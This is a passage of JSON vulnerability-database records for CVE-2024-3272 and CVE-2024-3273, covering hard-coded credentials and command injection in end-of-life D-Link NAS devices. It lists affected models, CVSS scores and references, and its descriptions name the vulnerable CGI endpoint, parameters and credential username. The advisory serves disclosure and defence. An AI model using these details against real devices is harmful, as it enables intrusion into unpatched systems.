"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-726-4",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-323",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-120",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-320",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-315l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-343",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-325",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-1100-4",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-315l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-120",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-320lw",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-726-4",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dnr-322l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-345",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dnr-326",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-320",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-320l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-343",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-323",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dnr-202l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-326",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-327l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-340l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-325",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-1200-05",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-1550-04",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-321",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003106"
},
{
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-320l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-320l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-120_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-120:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dnr-202l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dnr-202l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-315l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-315l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-320_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-320:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-320lw_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-320lw:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-321_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-321:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dnr-322l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dnr-322l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-323_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-323:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-325_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-325:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-326_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-326:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-327l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-327l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dnr-326_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dnr-326:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-340l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-340l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-343_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-343:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-345_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-345:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-726-4_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-726-4:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-1100-4_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-1100-4:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-1200-05_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-1200-05:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-1550-04_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-1550-04:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"cve": "CVE-2024-3272",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "cna@vuldb.com",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2024-3272",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2024-3272",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "cna@vuldb.com",
"id": "CVE-2024-3272",
"trust": 1.0,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003106"
},
{
"db": "NVD",
"id": "CVE-2024-3272"
},
{
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very critical, has been found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. This issue affects some unknown processing of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument user with the input messagebus leads to hard-coded credentials. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259283. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. D-Link DNS-320L firmware, dns-120 firmware, dnr-202l firmware etc. D-Link Systems, Inc. The product contains a vulnerability related to the use of hardcoded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-3272"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-003106"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-3272",
"trust": 2.6
},
{
"db": "VULDB",
"id": "259283",
"trust": 1.8
},
{
"db": "DLINK",
"id": "SAP10383",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2024-003106",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003106"
},
{
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"id": "VAR-202404-0069",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.6929112399999999
},
"last_update_date": "2024-06-05T23:17:51.346000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-798",
"trust": 1.0
},
{
"problemtype": "Use hard-coded credentials (CWE-798) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003106"
},
{
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://github.com/netsecfish/dlink"
},
{
"trust": 1.8,
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=sap10383"
},
{
"trust": 1.8,
"url": "https://vuldb.com/?id.259283"
},
{
"trust": 1.0,
"url": "https://vuldb.com/?ctiid.259283"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-3272"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003106"
},
{
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003106"
},
{
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-04-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-003106"
},
{
"date": "2024-04-04T01:15:50.123000",
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-04-19T06:10:00",
"db": "JVNDB",
"id": "JVNDB-2024-003106"
},
{
"date": "2024-06-04T19:20:18.520000",
"db": "NVD",
"id": "CVE-2024-3272"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0D-Link\u00a0Systems,\u00a0Inc.\u00a0 Product use of hardcoded credentials vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003106"
}
],
"trust": 0.8
}
}
VAR-202404-0070
Vulnerability from variot - Updated: 2024-06-05 23:17** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. D-Link DNS-320L firmware, dns-120 firmware, dnr-202l firmware etc. D-Link Systems, Inc. The product contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202404-0070",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dns-320l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dnr-202l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-327l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-1550-04",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-1200-05",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-340l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-320lw",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-326",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dnr-326",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dnr-322l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-345",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-321",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-1100-4",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-726-4",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-323",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-120",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-320",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-315l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-343",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-325",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-1100-4",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-315l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-120",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-320lw",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-726-4",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dnr-322l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-345",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dnr-326",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-320",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-320l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-343",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-323",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dnr-202l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-326",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-327l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-340l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "d-link dns-325",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-1200-05",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-1550-04",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dns-321",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-003105"
},
{
"db": "NVD",
"id": "CVE-2024-3273"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-320l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-320l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-120_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-120:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dnr-202l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dnr-202l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-315l_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-315l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-320_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-320:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dns-320lw_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dns-320lw:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
